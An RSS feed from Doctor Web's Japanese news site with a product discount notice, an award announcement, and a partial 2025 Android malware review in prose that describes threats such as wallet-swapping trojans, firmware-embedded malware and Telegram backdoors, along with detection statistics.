<?xml version="1.0"?>
<rss version="2.0"><channel><title>全てのニュース</title><link>https://news.drweb.co.jp/news/</link><description>Doctor Web news - 全てのニュース</description><image><url>https://st.drweb.com/static/drweb_logo_ja.gif</url><link>https://news.drweb.co.jp/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.co.jp/show/?i=15141&amp;lng=ja</guid><title>新学期に向けて「Dr.Web Security Space」を20%OFFで提供</title><link>https://news.drweb.co.jp/show/?i=15141&amp;lng=ja&amp;c=5</link><pubDate>Wed, 01 Apr 2026 12:30:42 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;新年度を迎え、ご家庭でのパソコンやデジタル機器の利用が増える時期となりました。これに合わせ、当社はセキュリティソフト「Dr.Web Security Space（2台・1年ライセンス）」を通常価格より20%OFFの特別価格で提供します。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;近年、学習用PCや業務用端末を狙うサイバー攻撃はますます巧妙化しています。新生活を安心してスタートするためにも、この機会にセキュリティ対策の見直しをご検討ください。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;【キャンペーン概要】&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;対象商品：Dr.Web Security Space（2台／1年）&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;通常価格：3,581円（税込）&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;キャンペーン価格：2,865円（税込）&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;実施期間：4月1日（火）～4月7日（月）&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;特設ページ：&lt;/strong&gt;&lt;a href="https://www.drweb.co.jp/landing/april26"&gt;&lt;strong&gt;https://www.drweb.co.jp/landing/april26/&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;新年度の安心・安全なデジタル環境づくりのために、ぜひこの機会をご活用ください。&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15134&amp;lng=ja</guid><title>PC向けセキュリティ製品「Dr.Web Security Space」、SKD AWARDSを受賞</title><link>https://news.drweb.co.jp/show/?i=15134&amp;lng=ja&amp;c=5</link><pubDate>Thu, 26 Mar 2026 13:06:16 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;PC向けセキュリティ製品「Dr.Web Security Space」が、SKD AWARDSにおいて再び業界賞を受賞しました。Dr.Web Security Spaceは、PC向けアンチウイルスソフト部門において最優秀製品として選出されました。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;今回の受賞は、Doctor Webにとって3年連続となります。2023年には「Dr.Web Security Space for Windows 12.0」がPCセキュリティ部門で受賞し、2024年には同製品が再び最優秀賞に選ばれたほか、「Dr.Web Mobile Engine SDK」がアンチウイルスエンジン部門で受賞しました。&lt;/p&gt;&lt;p&gt;SKD AWARDSは、情報セキュリティ分野で知られる独立系のテスト・認証機関であるSKD Labsが毎年開催する表彰制度です。「サイバーセキュリティ製品のオスカー」とも称され、専門製品の有効性を評価する重要な指標とされています。&lt;/p&gt;&lt;p&gt;本アワードでは、製品は機能性、パフォーマンス、技術革新性、実環境での動作、脅威の検知力および対応能力などについて、一連のテストにより評価されます。&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.co.jp/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15104&amp;lng=ja</guid><title>2025年のモバイルマルウェアレビュー</title><link>https://news.drweb.co.jp/show/?i=15104&amp;lng=ja&amp;c=5</link><pubDate>Thu, 22 Jan 2026 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026年1月22日&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;概要&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;2025年に最も多く検出されたAndroid向け脅威は、広告を表示させるトロイの木馬ならびに詐欺目的で使用される偽アプリとなりました。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;最も多く検出された望ましくないアプリケーションは前年同様、ゲームのようなタスクを完了することで仮想報酬を得ることができるとうたうアプリでした。この報酬は現金化できるとされていますが、実際にユーザーがお金を手にすることはありません。&lt;/p&gt;

&lt;p&gt;最も多く検出されたリスクウェアは、NP Managerツールを使用して改造されたアプリとなりました。このツールはアプリのコードを難読化して解析や検出から保護するだけでなく、改造後にデジタル署名検証を回避できるようにします。最も多く検出されたアドウェアは、ユーザーによる使用中に自動で広告リンクを開くWhatsApp Messengerの非公式改造版でした。&lt;/p&gt;

&lt;p&gt;2025年には、さまざまなAndroidデバイスモデルのファームウェア内にマルウェアが埋め込まれる新たな事例が確認されました。Doctor Webではそのうちの1例について4月に記事を公開しています。安価なスマートフォンモデルのいくつかに、被害者から仮想通貨を盗むトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; がプリインストールされていたというものです。&lt;/p&gt;

&lt;p&gt;同じく春には、地図アプリ「AlpineQuest」の改変版に埋め込まれていたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; が発見されました。このマルウェアはロシアの軍関係者を標的としたサイバースパイ活動に使用されていました。&lt;/p&gt;

&lt;p&gt;夏の終わりには人気のメッセンジャーを介して拡散されていたバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; について記事を公開しました。このバックドアはロシア企業の従業員をスパイして機密情報を収集することを目的としたものでした。&lt;/p&gt;

&lt;p&gt;秋にはメッセンジャーアプリTelegram Xの改変版に埋め込まれた危険なバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; が発見されました。このマルウェアは脅威アクターが被害者のTelegramアカウントを乗っ取りユーザーに成り代わってメッセンジャーそのものを操作できるようにします。&lt;/p&gt;

&lt;p&gt;Google Playでは2025年を通して180を超える脅威が発見され、そのダウンロード数は合計で216万5000回を超えています。それらの中にはユーザーを有料サービスに登録するさまざまなトロイの木馬や詐欺に用いられる偽アプリ、そして新たなアドウェアや望ましくないアプリが含まれていました。&lt;/p&gt;

&lt;p&gt;2025年にもマルウェア作成者たちはAndroidマルウェアの解析を複雑化させたりアンチウイルスによる検出を回避したりするためにあらゆる手法を駆使し続けています。なかでも人気を集めている手法の1つがDEXコードをCコードに変換するというものです。さらに、マルウェアを作成する際のアプリのコード記述にAIアシスタントの助けを借りているケースもDoctor Webのウイルスアナリストによって確認されています。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;2025年の主な傾向&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;広告を表示させるトロイの木馬が引き続き最も多く検出されたAndroid脅威となる&lt;/li&gt;
        &lt;li&gt;改造したアプリのコードを難読化し、改造後のデジタル署名検証をバイパスできるようにするツールNP Manager が多く使用されるようになる&lt;/li&gt;
        &lt;li&gt;バンキング型トロイの木馬の活動が活発化&lt;/li&gt;
        &lt;li&gt;Android デバイスのファームウェア感染に新たな事例が確認される&lt;/li&gt;
        &lt;li&gt;サイバー犯罪者はマルウェアを検出や解析から保護するために依然として従来の手法と新たな手法の両方を駆使&lt;/li&gt;
        &lt;li&gt;マルウェア作成者は悪意のあるコードの記述にAIアシスタントを積極的に活用&lt;/li&gt;
        &lt;li&gt;Google Playに新たな脅威が出現&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;2025年の最も注目すべきイベント&lt;/h3&gt;

&lt;p&gt;2025年4月、Doctor WebのエキスパートはAndroidデバイスユーザーから仮想通貨（暗号資産）を盗む大規模なキャンペーンを&lt;a href="https://news.drweb.co.jp/show/?i=15002&amp;lng=ja" target="_blank"&gt;発見しました&lt;/a&gt;。攻撃者は中国の複数のサプライチェーンを侵害し、いくつかの低価格帯スマートフォンモデルのファームウェアにトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; を仕込んでいました。 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; はメッセージングアプリWhatsAppに組み込まれており、このトロイの木馬化された改変版WhatsAppの作成には、コードに手を加えることなくアプリの動作ロジックを変更できる &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt; ツールが使用されていました。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; はWhatsApp内で送受信されるメッセージを傍受し、仮想通貨TronおよびEthereumのウォレットアドレス形式に一致する文字列を検出してそれらを攻撃者のアドレスに置き換えます。同時に、置き換えに気づかれることのないようユーザーに対しては正しいウォレットアドレスを表示させます。また、スクリーンショットとして保存されている、仮想通貨ウォレットへのアクセスを可能にするニーモニック（mnemonic）フレーズを見つけるためにすべての &lt;em&gt;jpg&lt;/em&gt;、&lt;em&gt;png&lt;/em&gt;、&lt;em&gt;jpeg&lt;/em&gt; 画像を攻撃者に送信します。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; はWhatsAppの他にも数十のアプリに組み込まれており、これには広く使用されている仮想通貨ウォレットアプリやQRコードスキャナ、Telegramなどの他のメッセージングアプリが含まれています。改変されたこれらのアプリは悪意のあるWebサイトから拡散されていました。&lt;/p&gt;

&lt;p&gt;2025年には、このようにAndroidデバイスのシステム領域にマルウェアがプリインストールされる事例について他にも新たなものが発見されています。その１例としてあげられるのが、悪意のあるグループによって危険なトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; の新たなバージョンが複数の安価なスマートフォンのファームウェアに埋め込まれていたというものです。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; が危険な脅威とされるのは、システムのZygoteプロセスを感染させることができるためです。このプロセスはシステム内のすべてのアプリケーションの起動に直接関与しています。つまり、Zygoteプロセスを感染させることで &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; はデバイス上のあらゆるアプリケーション内に侵入することができ、事実上完全にデバイスのコントロールを掌握することが可能になります。脅威アクターは &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; を使用することで望ましくないアプリやアドウェアなどといった別のマルウェアをダウンロードしてインストールできるほか、被害者をスパイしたり、有料サービスに登録したりすることも可能です。そのほか、2024年にDoctor Webによって&lt;a href="https://news.drweb.co.jp/show/?i=14900&amp;lng=ja" target="_blank"&gt;発見された&lt;/a&gt; トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Vo1d&amp;lng=ja"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; の新たな亜種が関与するAndroid TVボックスのファームウェア感染にも新たな事例が確認されました。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Vo1d&amp;lng=ja"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; は感染させたデバイスのシステム領域に自身のコンポーネントを置くバックドアで、攻撃者のコマンドに応じてサードパーティソフトウェアを密かにダウンロードしてインストールする機能を備えています。&lt;/p&gt;

&lt;p&gt;同じく4月、Doctor Webのアンチウイルスラボはロシアの軍関係者を標的にスパイウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; を拡散する攻撃キャンペーンを&lt;a href="https://news.drweb.co.jp/show/?i=15006&amp;lng=ja" target="_blank"&gt;発見しました&lt;/a&gt;。脅威アクターはこのトロイの木馬を地図アプリ「AlpineQuest」の一部のバージョンに埋め込み、作成した偽のTelegramチャンネルを公式と偽ってそこから拡散していました。そのほか、ロシアのAndroidアプリ配信サイトも拡散源となっています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;攻撃者がトロイの木馬 &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt; の潜んだ悪意のある改変版「AlpineQuest」を拡散するために使用していたTelegramチャンネル&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; は携帯電話番号とアカウント、電話帳の連絡先、デバイスの位置情報、デバイスのメモリ内に保存されているファイルに関する情報などといった機密データをサイバー犯罪者に送信していました。また、攻撃者からコマンドを受け取った場合は特定のファイルを盗むこともできます。主に狙われていたのはユーザーがTelegramやWhatsApp経由で送信する機密文書、そしてAlpineQuestによって作成される位置情報ログファイルでした。&lt;/p&gt;

&lt;p&gt;8月、Doctor Webは人気のメッセージングアプリのダイレクトメッセージ（DM）を使用して拡散されていたバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; について記事を&lt;a href="https://news.drweb.co.jp/show/?i=15047&amp;lng=ja" target="_blank"&gt;公開しました&lt;/a&gt;。被害者はメッセージに添付されたAPKファイルから「アンチウイルス」をインストールするよう促されますが、実際にはこのファイルにマルウェアが潜んでいます。Doctor Webのアンチウイルスラボは2025年1月に &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; の最初のバージョンを発見し、それ以来その活動を監視してきました。このことが、今回の新たなキャンペーンの迅速な特定につながりました。&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;アンチウイルスの動作を模倣してユーザーを欺く&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Androidデバイスにインストールされると、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; は攻撃者が機密情報を窃取しユーザーをスパイすることを可能にします（会話を盗聴する、デバイスのカメラからブロードキャストする、位置情報を追跡する、メッセンジャーやブラウザから内容を盗むなど）。さらに、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; はキーロガー機能も備えており、入力されたテキスト（パスワードなど）を傍受します。このバックドアは不特定のAndroidユーザー間での大量拡散を狙ったものではなく標的型攻撃を目的に設計されているものと考えられ、その主たる標的はロシア企業の従業員でした。&lt;/p&gt;

&lt;p&gt;10月、Doctor WebはメッセンジャーアプリTelegram Xの改変版に潜む多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を発見しました。主な拡散源はユーザーがアプリ内広告からリダイレクトされる悪意のあるWebサイトです。これらのサイトでユーザーはチャットやデートの相手を見つけるための便利なアプリとして紹介されているTelegram Xをインストールするよう勧められます。標的とされていたのは主にブラジルとインドネシアのユーザーでした。拡散源は悪意のあるサイトだけではなく、サードパーティアプリストアでも &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; が検出されています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;トロイの木馬化されたバージョンのTelegram Xがダウンロードされていた悪意のあるサイトの1つ&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; の実行するタスクの1つが機密データの窃取で、被害者のTelegramアカウントからログインIDとパスワード、チャット履歴、着信SMS、電話帳の連絡先を盗むほか、クリップボードの内容を傍受します。しかしながら、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; は単にスパイウェアとして機能するだけではありません。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を使用することで脅威アクターはハッキングしたアカウントとメッセンジャー自体の両方を乗っ取り、さまざまな操作を実行することが可能です。たとえば、ユーザーを密かにTelegramチャンネルに追加・削除したり、ユーザーに成り代わってチャットへの参加・退出を行ったり、アカウントの認証済みデバイスを非表示にしたりできます。Telegram Xの動作ロジックを変更する必要のあるアクションを実行する場合には、Xposedフレームワークが使用されます。バックドアの操作には従来の方法であるC2サーバー経由に加え、これまでAndroidマルウェアでは例を見ないRedisデータベース経由でのコマンド送信が使用されています。合計で58,000台を超えるデバイスが &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; に感染しており、これにはおよそ3千の異なるモデルのスマートフォンやタブレット、TVボックスセット、そしてAndroidベースの車載OSを搭載した自動車が含まれていました。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_en_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt; に感染したデバイス数の多い国&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;統計&lt;/h3&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年に最も多く検出されたAndroid脅威はさまざまな悪意のあるプログラムで、検出された脅威全体の81.11%を占めました。次いでリスクウェアが10.73%を占めて2位となり、アドウェアが5.89%を占めて3位につけました。最も検出数の少なかったのは望ましくないアプリで、2.27%を占めて最下位となっています。&lt;/p&gt;

&lt;p&gt;2024年比での全検出数に占める割合は、悪意のあるプログラムとリスクウェアで増加し、望ましくないアプリとアドウェアでは減少しています。&lt;/p&gt;

&lt;p&gt;以下のグラフは、脅威の内訳を種類別に表したものです。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;悪意のあるプログラム&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;最も多く検出されたマルウェアの座はここ数年にわたって &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ファミリーに属する広告を表示するトロイの木馬が占めており、2025年にもこの状況に変化はみられませんでした。ただし、マルウェア検出数全体に占める &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; の割合は31.95%から27.42%へとわずかに減少しています。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;これらトロイの木馬は全画面（フルスクリーン）バナーや動画という形で迷惑な広告を表示させます。また、ユーザーによる検出や削除から逃れるため、インストールされた後に自身の存在を隠そうとします（ホーム画面の自身のアイコンを隠したり置き換えたりするなど）。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ファミリーの中で最も多く検出されたのは &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; で、同ファミリー検出数全体の3分の1以上を占めています。このトロイの木馬は2021年から知られている &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; の数ある亜種の1つで、2024年にDoctor Webウイルスアナリストの目を引き、2025年ついにトップに躍り出ました。2025年には &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; や &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt; など、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; の新たな亜種もいくつか拡散されています。他の亜種がそうであったように、これらの亜種もいずれ上位に進出してくる可能性があります。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; のサブファミリーであるAegisも引き続き検出されていますが、ファミリー検出数全体に占める割合は17.37%から3.11%へと大幅に減少しています。これらトロイの木馬はインストール後自動的に起動することができます。最も多く検出された亜種は &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds.Aegis&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; と &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds.Aegis&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt; でした。&lt;/p&gt;

&lt;p&gt;2番目に多く検出されたマルウェアはアドウェア型トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; で、マルウェア検出数全体に占める割合は5.38%から15.64%に増加しました。最も多く検出された亜種は &lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt; となっています。3番目に多く検出されたマルウェアは、サイバー犯罪者によってさまざまな詐欺スキームに用いられる偽アプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; でした。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; はうたわれた機能を実行する代わりにさまざまなサイトを開きます。マルウェア検出数全体に占める割合は2024年の18.28%から減少し10.94%となりました。この減少の一因となっているのが、オンラインカジノのサイトを開くことを主な目的としたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt; の活動低下です。ただし、この &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt; は依然として &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; ファミリーの中で最も多く拡散されている亜種となっています。&lt;/p&gt;

&lt;p&gt;多様なスパイウェア機能を備えたトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy&amp;lng=ja"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt; ファミリーの、マルウェア検出数全体に占める割合は11.52%から3.09%へと減少しました。一方、バンキング型トロイの木馬の活動は増加し、その検出数が占める割合は6.29%から6.94%に増加しています。&lt;/p&gt;

&lt;p&gt;マルウェアを検出や解析から保護するために使用されるソフトウェアパッカーの検出数は5.49%から6.01%へと増加しました。最も多く検出されたのは &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Packed&amp;lng=ja"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt; でパックされた悪意のあるアプリでした。&lt;/p&gt;

&lt;p&gt;WhatsApp MessengerのさまざまなMod（改造版）も多く拡散され、その中にはユーザーに気づかれず密かにWebサイトを開くという亜種もありました（Dr.Webによって &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Click&amp;lng=ja"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt; として検出）。多機能トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; ファミリーの活動も増加し、2.74%から7.48%となりました。これはサイバー犯罪者によってAndroidデバイスのファームウェアに埋め込まれるトロイの木馬です。&lt;/p&gt;

&lt;p&gt;以下のグラフは2025年に最も多く検出された上位10のマルウェアです。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.1.png" alt="#drweb"&gt;
